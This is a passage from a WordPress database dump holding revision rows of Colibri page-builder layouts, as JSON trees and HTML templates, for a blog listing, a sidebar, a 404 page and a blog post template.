3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3Cdiv%20%20%20data-colibri-id=%22639-m7%22%20class=%22h-blog-title%20style-144%20style-local-40-m7%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_title%20heading_type=%22h4%22%20classes=%22colibri-word-wrap%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22639-m8%22%20class=%22h-blog-meta%20style-145%20style-local-40-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%20%3Cspan%20class=%22meta-separator%22%3E%7C%20%3C/span%3E%3C/div%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eon%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22639-m9%22%20class=%22style-146%20style-local-40-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_excerpt%20max_length=%22%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20%20data-colibri-id=%22639-m10%22%20class=%22h-x-container%20style-147%20style-local-40-m10%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-x-container-inner%20style-dynamic-40-m10-group%22%3E%3C!----%3E%3Cspan%20%20%20class=%22h-button__outer%20style-148-outer%20style-local-40-m11-outer%20d-inline-flex%20h-element%22%20%20%20%20%3E%3Ca%20%20h-use-smooth-scroll=%22true%22%20href=%22%5Bcolibri_post_link%5D%22%20%20data-colibri-id=%22639-m11%22%20class=%22d-flex%20w-100%20align-items-center%20h-button%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20style-148%20style-local-40-m11%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cspan%20%3Eread%20more%3C/span%3E%20%3Cspan%20%20class=%22h-svg-icon%20h-button__icon%20style-148-icon%20style-local-40-m11-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%3Csvg%20version=%221.1%22%20xmlns=%22http://www.w3.org/2000/svg%22%20xmlns:xlink=%22http://www.w3.org/1999/xlink%22%20id=%22arrow-right%22%20viewBox=%220%200%20512%20545.5%22%3E%3Cpath%20d=%22M299.5%20140.5l136%20136%2011%2011.5-11%2011.5-136%20136-23-23L385%20304H64v-32h321L276.5%20163.5z%22%3E%3C/path%3E%3C/svg%3E%3C/span%3E%3C/a%3E%3C/span%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n      </div>\n  </div>[colibri_layout_wrapper name=\"navigation_container\"]\n  <div data-colibri-id=\"40-m12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-149 style-local-40-m12 position-relative\">\n    <!---->\n    <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n      <!---->\n      <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col style-150-outer style-local-40-m13-outer\">\n        <div data-colibri-id=\"40-m13\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-150 style-local-40-m13 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n            <!---->\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-151-outer style-local-40-m14-outer\">\n        <div data-colibri-id=\"40-m14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-151 style-local-40-m14 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"40-m15\" class=\"style-152 style-local-40-m15 position-relative h-element\">\n              <!---->\n              <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"prev\" next_label=\"Next\" prev_label=\"Back\"]</div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-153-outer style-local-40-m16-outer\">\n        <div data-colibri-id=\"40-m16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-153 style-local-40-m16 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"40-m17\" class=\"style-154 style-local-40-m17 position-relative h-element\">\n              <!---->\n              <div class=\"h-global-transition-all\">[colibri_archive_pagination]</div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-155-outer style-local-40-m18-outer\">\n        <div data-colibri-id=\"40-m18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-155 style-local-40-m18 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"40-m19\" class=\"style-156 style-local-40-m19 position-relative h-element\">\n              <!---->\n              <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"next\" next_label=\"Next\" prev_label=\"Back\"]</div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>[/colibri_layout_wrapper]\n  <div data-colibri-id=\"40-m20\" id=\"search-results\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-157 style-local-40-m20 position-relative\">\n    <!---->\n    <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n      <!---->\n      <div class=\"h-column h-column-container d-flex h-col-lg-12 h-col-md-12 h-col-12 style-158-outer style-local-40-m21-outer\">\n        <div data-colibri-id=\"40-m21\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-158 style-local-40-m21 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <hop-archive-navigation previewid=\"639-m22\" hmodel=\"[object Object]\" parentmodelobj=\"[object Object]\" rootmodel=\"[object Object]\" ispreview=\"true\" class=\"h-element\"></hop-archive-navigation>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','main_search','','inherit','closed','closed','','40-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',40,'https://gsudice.dataconn.net/?p=66',0,'revision','',0),(67,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','{\"name\":\"hop-sidebar\",\"id\":\"43-s1\",\"partialId\":43,\"styleRef\":160,\"type\":\"sidebar\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"43-s15\",\"parentId\":\"43-s14\",\"partialId\":43,\"styleRef\":164,\"type\":\"sidebar\"},{\"name\":\"hop-text\",\"id\":\"43-s16\",\"parentId\":\"43-s14\",\"partialId\":43,\"styleRef\":165,\"type\":\"sidebar\"}],\"id\":\"43-s14\",\"parentId\":\"43-s13\",\"partialId\":43,\"styleRef\":163,\"type\":\"sidebar\"}],\"id\":\"43-s13\",\"parentId\":\"43-s2\",\"partialId\":43,\"styleRef\":162,\"type\":\"sidebar\"}]},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"43-s4\",\"parentId\":\"43-s3\",\"partialId\":43,\"children\":[{\"name\":\"hop-widget-area\",\"props\":{\"widgetAreaId\":\"sidebar-1\"},\"id\":\"43-s5\",\"parentId\":\"43-s4\",\"partialId\":43,\"children\":[{\"name\":\"hop-search-widget\",\"id\":\"43-s6\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":169,\"type\":\"sidebar\",\"props\":{\"stateButton\":\"\",\"showButton\":true,\"showPlaceholder\":true,\"stateInput\":\"\",\"showIconButton\":true}},{\"name\":\"hop-recent-post-widget\",\"id\":\"43-s7\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":170,\"type\":\"sidebar\"},{\"name\":\"hop-recent-comments-widget\",\"id\":\"43-s8\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":171,\"type\":\"sidebar\"},{\"name\":\"hop-archives-widget\",\"id\":\"43-s9\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":172,\"type\":\"sidebar\"},{\"name\":\"hop-categories-widget\",\"id\":\"43-s10\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":173,\"type\":\"sidebar\"},{\"name\":\"hop-meta-widget\",\"id\":\"43-s11\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":174,\"type\":\"sidebar\"},{\"name\":\"hop-text-widget\",\"id\":\"43-s12\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":175,\"type\":\"sidebar\"}],\"styleRef\":168,\"type\":\"sidebar\"}],\"styleRef\":167,\"type\":\"sidebar\"}],\"id\":\"43-s3\",\"parentId\":\"43-s2\",\"partialId\":43,\"styleRef\":166,\"type\":\"sidebar\"}],\"parentId\":\"43-s1\",\"type\":\"sidebar\",\"props\":{\"anchor\":false,\"name\":\"Blog Sidebar\",\"attrs\":{\"id\":\"blog-sidebar\"}},\"id\":\"43-s2\",\"partialId\":43,\"styleRef\":161}]}','','','inherit','closed','closed','','44-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',44,'https://gsudice.dataconn.net/?p=67',0,'revision','',0),(68,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','<div data-colibri-id=\"43-s1\" class=\"style-160 style-local-43-s1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"43-s2\" id=\"blog-sidebar\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-161 style-local-43-s2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"43-s3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-166 style-local-43-s3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-167-outer style-local-43-s4-outer\">\n            <div data-colibri-id=\"43-s4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-167 style-local-43-s4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"43-s5\" class=\"h-widget-area style-168 style-local-43-s5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all widget-shortcode\">[colibri_widget_area id=\"sidebar-1\"]</div>\n                  <div data-colibri-id=\"43-s6\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-colibri-id=\"43-s7\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-colibri-id=\"43-s8\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-colibri-id=\"43-s9\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-colibri-id=\"43-s10\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-colibri-id=\"43-s11\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-colibri-id=\"43-s12\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','sidebar_post','','inherit','closed','closed','','43-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',43,'https://gsudice.dataconn.net/?p=68',0,'revision','',0),(75,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"37-m3\",\"index\":0,\"id\":\"37-m4\",\"partialId\":37,\"styleRef\":134,\"type\":\"main\",\"props\":{\"content\":\"404\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"37-m3\",\"index\":1,\"id\":\"37-m5\",\"partialId\":37,\"styleRef\":135,\"type\":\"main\",\"props\":{\"content\":\"<p>Sorry, page not found!<\\/p>\"}},{\"name\":\"hop-home-button-group\",\"children\":[{\"name\":\"hop-home-button\",\"props\":{\"text\":\"Go to Homepage!\",\"iconName\":\"icons8-line-awesome\\/arrow-right\"},\"id\":\"37-m7\",\"parentId\":\"37-m6\",\"partialId\":37,\"styleRef\":137,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"37-m3\",\"index\":2,\"id\":\"37-m6\",\"partialId\":37,\"styleRef\":136,\"type\":\"main\"}],\"id\":\"37-m3\",\"parentId\":\"37-m2\",\"partialId\":37,\"styleRef\":133,\"type\":\"main\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}}}],\"id\":\"37-m2\",\"parentId\":\"37-m1\",\"partialId\":37,\"styleRef\":132,\"type\":\"main\",\"props\":{\"name\":\"Nothing found\",\"attrs\":{\"id\":\"nothing-found\"}}}],\"id\":\"37-m1\",\"partialId\":37,\"styleRef\":131,\"type\":\"main\"}','','','inherit','closed','closed','','38-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',38,'https://gsudice.dataconn.net/?p=75',0,'revision','',0),(76,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','<div data-colibri-id=\"37-m1\" class=\"style-131 style-local-37-m1 position-relative\">\n  <!---->\n  <div data-colibri-id=\"37-m2\" id=\"nothing-found\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-132 style-local-37-m2 position-relative\">\n    <!---->\n    <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n      <!---->\n      <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col-auto style-133-outer style-local-37-m3-outer\">\n        <div data-colibri-id=\"37-m3\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-133 style-local-37-m3 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"37-m4\" class=\"h-global-transition-all h-heading style-134 style-local-37-m4 position-relative h-element\">\n              <!---->\n              <!---->\n              <h2 class=\"\">404</h2>\n            </div>\n            <div data-colibri-id=\"37-m5\" class=\"h-text h-text-component style-135 style-local-37-m5 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Sorry, page not found!</p>\n              </div>\n            </div>\n            <div data-colibri-id=\"37-m6\" class=\"h-x-container style-136 style-local-37-m6 position-relative h-element\">\n              <!---->\n              <div class=\"h-x-container-inner style-dynamic-37-m6-group\">\n                <!----><span class=\"h-button__outer style-137-outer style-local-37-m7-outer d-inline-flex h-element\"><a  h-use-smooth-scroll=\"true\" href=\"[colibri_home_url]\"  data-colibri-id=\"37-m7\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-137 style-local-37-m7 position-relative\"><!----><!----> <span >Go to Homepage!</span>                <span class=\"h-svg-icon h-button__icon style-137-icon style-local-37-m7-icon\"><!--Icon by Icons8 Line Awesome (https://icons8.com/line-awesome)-->[colibri_svg_icon name=icons8-line-awesome/arrow-right]</span></a>\n                </span>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','main_404','','inherit','closed','closed','','37-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',37,'https://gsudice.dataconn.net/?p=76',0,'revision','',0),(77,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"31-m27\",\"parentId\":\"31-m26\",\"partialId\":31,\"styleRef\":70,\"type\":\"main\"},{\"name\":\"hop-text\",\"id\":\"31-m28\",\"parentId\":\"31-m26\",\"partialId\":31,\"styleRef\":71,\"type\":\"main\"}],\"id\":\"31-m26\",\"parentId\":\"31-m25\",\"partialId\":31,\"styleRef\":69,\"type\":\"main\"}],\"id\":\"31-m25\",\"parentId\":\"31-m2\",\"partialId\":31,\"styleRef\":68,\"type\":\"main\"}]},\"children\":[{\"name\":\"hop-post-loop\",\"slots\":{\"item\":[{\"name\":\"hop-loop-item\",\"children\":[{\"name\":\"hop-post-thumbnail\",\"id\":\"31-m5\",\"parentId\":\"31-m4\",\"partialId\":31,\"styleRef\":74,\"type\":\"main\",\"props\":{\"showPlaceholder\":false,\"addLink\":false}},{\"name\":\"hop-row\",\"id\":\"31-m6\",\"parentId\":\"31-m4\",\"partialId\":31,\"styleRef\":75,\"type\":\"main\",\"children\":[{\"name\":\"hop-column\",\"id\":\"31-m7\",\"parentId\":\"31-m6\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-meta\",\"slot\":null,\"parentId\":\"31-m7\",\"index\":1,\"id\":\"31-m8\",\"partialId\":31,\"styleRef\":77,\"type\":\"main\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":true,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"by \"},{\"value\":\"date\",\"name\":\"Date\",\"check\":true,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"on \"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"at \"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"comments\"}],\"showIcons\":false,\"separator\":\"\"}},{\"name\":\"hop-post-content\",\"parentId\":\"31-m7\",\"id\":\"31-m9\",\"partialId\":31,\"styleRef\":78,\"type\":\"main\"},{\"name\":\"hop-post-categories-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"31-m11\",\"parentId\":\"31-m10\",\"partialId\":31,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"31-m11\",\"index\":0,\"id\":\"31-m12\",\"partialId\":31,\"styleRef\":81,\"type\":\"main\",\"props\":{\"content\":\"<p>Categories:<\\/p>\"}}],\"styleRef\":80,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"id\":\"31-m13\",\"parentId\":\"31-m10\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-categories\",\"slot\":null,\"parentId\":\"31-m13\",\"index\":0,\"id\":\"31-m14\",\"partialId\":31,\"styleRef\":83,\"type\":\"main\"}],\"styleRef\":82,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"31-m7\",\"index\":1,\"id\":\"31-m10\",\"partialId\":31,\"styleRef\":79,\"type\":\"main\"},{\"name\":\"hop-post-tags-container\",\"slot\":null,\"parentId\":\"31-m7\",\"index\":1,\"id\":\"31-m15\",\"partialId\":31,\"styleRef\":84,\"type\":\"main\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"31-m16\",\"parentId\":\"31-m15\",\"partialId\":31,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"31-m16\",\"index\":0,\"id\":\"31-m17\",\"partialId\":31,\"styleRef\":86,\"type\":\"main\",\"props\":{\"content\":\"<p>Tags:<\\/p>\"}}],\"styleRef\":85,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"id\":\"31-m18\",\"parentId\":\"31-m15\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-tags\",\"slot\":null,\"parentId\":\"31-m18\",\"index\":2,\"id\":\"31-m19\",\"partialId\":31,\"styleRef\":88,\"type\":\"main\",\"props\":{\"prefix\":\"\"}}],\"styleRef\":87,\"type\":\"main\"}]}],\"styleRef\":76,\"type\":\"main\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}}}],\"slot\":null,\"index\":1},{\"name\":\"hop-post-nav-container\",\"parentId\":\"31-m4\",\"id\":\"31-m20\",\"partialId\":31,\"styleRef\":89,\"type\":\"main\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"31-m21\",\"parentId\":\"31-m20\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-nav-button\",\"slot\":null,\"parentId\":\"31-m21\",\"index\":0,\"id\":\"31-m22\",\"partialId\":31,\"styleRef\":91,\"type\":\"main\",\"props\":{\"type\":\"prev\",\"showPostTitle\":false,\"prevLabel\":\"Previous post\",\"postTitleLength\":\"40\",\"stateType\":\"\"}}],\"styleRef\":90,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"31-m23\",\"parentId\":\"31-m20\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-nav-button\",\"slot\":null,\"parentId\":\"31-m23\",\"index\":0,\"id\":\"31-m24\",\"partialId\":31,\"styleRef\":93,\"type\":\"main\",\"props\":{\"nextLabel\":\"Next post\",\"showPostTitle\":false,\"stateType\":\"\"}}],\"styleRef\":92,\"type\":\"main\"}],\"slot\":null,\"index\":2}],\"id\":\"31-m4\",\"parentId\":\"31-m3\",\"partialId\":31,\"styleRef\":73,\"type\":\"main\"}]},\"slot\":null,\"parentId\":\"31-m2\",\"index\":0,\"id\":\"31-m3\",\"partialId\":31,\"styleRef\":72,\"type\":\"main\"}],\"parentId\":\"31-m1\",\"type\":\"main\",\"props\":{\"anchor\":false,\"name\":\"Blog Post\",\"attrs\":{\"id\":\"blog-post\"}},\"id\":\"31-m2\",\"partialId\":31,\"styleRef\":67},{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"31-m36\",\"parentId\":\"31-m35\",\"partialId\":31,\"styleRef\":97,\"type\":\"main\"},{\"name\":\"hop-text\",\"id\":\"31-m37\",\"parentId\":\"31-m35\",\"partialId\":31,\"styleRef\":98,\"type\":\"main\"}],\"id\":\"31-m35\",\"parentId\":\"31-m34\",\"partialId\":31,\"styleRef\":96,\"type\":\"main\"}],\"id\":\"31-m34\",\"parentId\":\"31-m29\",\"partialId\":31,\"styleRef\":95,\"type\":\"main\"}]},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"31-m31\",\"parentId\":\"31-m30\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-comments\",\"slot\":null,\"parentId\":\"31-m31\",\"index\":0,\"id\":\"31-m32\",\"partialId\":31,\"styleRef\":101,\"type\":\"main\",\"props\":{\"multipleTitle\":\"{COMMENTS-COUNT} Responses\",\"avatarSize\":30,\"noneTitle\":\"No responses yet\"}},{\"name\":\"hop-post-comment-form\",\"id\":\"31-m33\",\"parentId\":\"31-m31\",\"partialId\":31,\"styleRef\":102,\"type\":\"main\"}],\"styleRef\":100,\"type\":\"main\"}],\"id\":\"31-m30\",\"parentId\":\"31-m29\",\"partialId\":31,\"styleRef\":99,\"type\":\"main\"}],\"parentId\":\"31-m1\",\"type\":\"main\",\"props\":{\"anchor\":false,\"name\":\"Comments\",\"attrs\":{\"id\":\"comments\"}},\"id\":\"31-m29\",\"partialId\":31,\"styleRef\":94}],\"id\":\"31-m1\",\"partialId\":31,\"styleRef\":66,\"type\":\"main\"}','','','inherit','closed','closed','','32-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',32,'https://gsudice.dataconn.net/?p=77',0,'revision','',0),(78,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','<div data-colibri-id=\"31-m1\" class=\"style-66 style-local-31-m1 h-overflow-hidden position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"31-m2\" id=\"blog-post\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-67 style-local-31-m2 position-relative\">\n    <!---->\n    <!---->\n    <div 